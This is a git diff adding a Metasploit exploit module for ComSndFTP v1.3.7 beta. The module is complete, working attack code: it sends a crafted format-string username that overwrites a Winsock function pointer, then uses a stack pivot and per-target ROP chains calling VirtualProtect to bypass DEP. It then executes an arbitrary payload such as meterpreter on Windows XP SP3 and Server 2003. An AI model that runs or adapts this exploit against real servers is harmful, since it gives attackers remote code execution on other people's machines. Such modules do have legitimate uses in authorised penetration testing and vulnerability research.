rapid7 · wchen-r7 · Jun 14, 2012 · Jun 13, 2012 · Jun 14, 2012 · jlee-r7
diff --git a/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb b/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb
@@ -0,0 +1,197 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = GreatRanking
+
+	include Msf::Exploit::Remote::Tcp
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'		=> 'ComSndFTP v1.3.7 Beta USER Format String Overflow',
+			'Description'	=> %q{
+					This module exploits the ComSndFTP FTP Server version 1.3.7 beta by sending a specially
+				crafted format string specifier as a username. The crafted username is sent to to the server to 
+				overwrite the hardcoded function pointer from Ws2_32.dll!WSACleanup. Once this function pointer 
+				is triggered, the code bypasses dep and then repairs the pointer to execute arbitrary code. 
+				The SEH exit function is prefered so that the administrators are not left with an unhandled 
+				exception message. When using the meterpreter payload, the process will never die, allowing
+				for continuous exploitation.
+			},
+			'Author'	=> [ 
+						'ChaoYi Huang <ChaoYi.Huang@connect.polyu.hk>', # vuln discovery + poc
+						'rick2600 <rick2600@corelan.be>',               # msf module (target XP)
+						'mr_me <mr_me0@corelan.be>',                    # msf module (target 23k)
+						'corelanc0d3r <peter.ve[at]corelan.be>'         # msf module 
+					   ],
+			'Arch'          => [ ARCH_X86 ],
+			'License'       => MSF_LICENSE,
+			'Version'       => '$Revision$',
+			'References'    =>
+				[
+					# When a DoS is NOT a DoS
+					[ 'EDB', '19024'],
+				],
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'seh',
+				},
+			'Platform' 	=> ['win'],
+			'Privileged'	=> false,
+			'Payload'	=>
+				{
+					'Space'			=> 1000,
+					'BadChars'		=> "\x00\x0a\x0d",
+					'StackAdjustment'	=> -3500,
+					'DisableNops'		=> 'True',
+				},
+			'Targets' 	=>
+				[
+					[ 
+						'Windows XP SP3 - English', 
+						{ 
+							'Functionpointer'   => 0x71AC4050,  # winsock pointer
+							'Functionaddress'   => 0x71AB2636,  # the repair address
+							'Pivot'             => 0x00408D16,  # 0x004093AE-0x698 add esp, 72c ; retn	
+							'Pad' => 568
+						} 
+					],
+					[ 
+						'Windows Server 2003 - English', 
+						{ 
+							'Functionpointer'   => 0x71C14044,  # winsock pointer
+							'Functionaddress'   => 0x71C02661,  # the repair address
+							'Pivot'             => 0x00408D16,  # 0x004093AE-0x698 add esp, 72c ; retn
+							'Pad' => 568
+						} 
+					],
+				],
+			'DisclosureDate' => 'Jun 08 2012'))
+
+		register_options(
+			[
+				Opt::RPORT(21),
+			], self.class)
+	end
+
+	def check
+		connect
+		banner    = sock.get(-1,3)
+		validate  = "\x32\x32\x30\x20\xbb\xb6\xd3\xad\xb9"
+		validate << "\xe2\xc1\xd9\x46\x54\x50\xb7\xfe\xce"
+		validate << "\xf1\xc6\xf7\x21\x0d\x0a"
+		disconnect
+
+		if (banner == validate)
+			return Exploit::CheckCode::Vulnerable
+		end
+		return Exploit::CheckCode::Safe
+	end
+
+
+	def exploit
+
+		rop = ''
+		if target.name =~ /Server 2003/
+			# C:\WINDOWS\system32\msvcrt.dll v7.0.3790.3959
+			rop = [
+			    	0x77be3adb, # pop eax ; retn
+			    	0x77ba1114, # <- *&VirtualProtect()
+			    	0x77bbf244, # mov eax,[eax] ; pop ebp ; retn
+			    	0x41414141, # junk ------------^
+			    	0x77bb0c86, # xchg eax,esi ; retn
+			    	0x77be3adb, # pop eax ; retn
+			    	0xFFFFFBFF, # dwSize
+			    	0x77BAD64D, # neg eax ; pop ebp ; retn
+			    	0x41414141, # junk ------^
+			    	0x77BBF102, # xchg eax,ebx ; add [eax],al ; retn
+			    	0x77bbfc02, # pop ecx ; retn
+			    	0x77bef001, # ptr that is w+
+			    	0x77bd8c04, # pop edi ; retn
+			    	0x77bd8c05, # retn
+			    	0x77be3adb, # pop eax ; retn
+			    	0xFFFFFFC0, # flNewProtect
+			    	0x77BAD64D, # neg eax ; pop ebp ; retn
+			    	0x77be2265, # ptr to 'push esp ; ret'
+			    	0x77BB8285, # xchg eax,edx ; retn
+			    	0x77be3adb, # pop eax ; retn
+			    	0x90909090, # nops
+			    	0x77be6591, # pushad ; add al,0ef ; retn
+			].pack("V*")
+		elsif target.name =~ /XP SP3/
+			# C:\WINDOWS\system32\msvcrt.dll v7.0.2600.5512
+			rop = [
+			    	0x77C21D16, # pop eax ; retn
+			    	0x77C11120, # <- *&VirtualProtect()
+			    	0x77C2E493, # mov eax,[eax] ; pop ebp ; retn
+			    	0x41414141, # junk ------------^
+			    	0x77C21891, # pop esi ; retn
+			    	0x77C5D010, # ptr that is w+
+			    	0x77C2DD6C, # xchg eax,esi ; add [eax],al; retn
+			    	0x77C21D16, # pop eax ; retn
+			    	0xFFFFFBFF, # dwSize
+			    	0x77C1BE18, # neg eax ; pop ebp ; retn
+			    	0x41414141, # junk ------^
+			    	0x77C2362C, # pop ebx ; retn
+			    	0x77C5D010, # ptr that is w+
+			    	0x77C2E071, # xchg eax,ebx ; add [eax],al ; retn
+			    	0x77C1F519, # pop ecx ; retn
+			    	0x77C5D010, # ptr that is w+
+			    	0x77C23B47, # pop edi ; retn
+			    	0x77C23B48, # retn
+			    	0x77C21D16, # pop eax ; retn
+			    	0xFFFFFFC0, # flNewProtect
+			    	0x77C1BE18, # neg eax ; pop ebp ; retn
+			    	0x77C35459, # ptr to 'push esp ; ret'
+			    	0x77C58FBC, # xchg eax,edx ; retn
+			    	0x77C21D16, # pop eax ; retn
+			    	0x90909090, # nops
+			    	0x77C567F0, # pushad ; add al,0ef ; retn
+			].pack("V*")
+		end
+
+		stage1 = %Q{
+			mov eax, #{target['Functionpointer']}
+			mov ecx, #{target['Functionaddress']}
+			mov [eax], ecx
+		}	
+
+		offset_wp = rand_text_alphanumeric(1)
+		pivot     = target['Pivot']
+		offset    = target['Pad'] + rop.length + stage1.length + payload.encoded.length
+
+		attackstring  = rand_text_alphanumeric(7)
+		attackstring << [target['Functionpointer']].pack('V')
+		attackstring << "%#{pivot}x"                          # special pointer to our pivot
+		attackstring << "%p" * 208 + "#{offset_wp }%n"        # format specifiers to read and write the function pointer
+		attackstring << rand_text_alphanumeric(target['Pad'])
+		attackstring << rop
+		attackstring << Metasm::Shellcode.assemble(Metasm::Ia32.new, stage1).encode_string
+		attackstring << payload.encoded
+		attackstring << rand_text_alphanumeric(2000 - offset)
+		attackstring << "\r\n"
+
+		sploit = "USER #{attackstring}\r\n"
+
+		print_status("Triggering overflow...")
+		connect
+		sock.get_once(1024)
+		sock.put(sploit)
+		select(nil, nil, nil, 2)
+		handler
+		disconnect
+
+	end
+
+end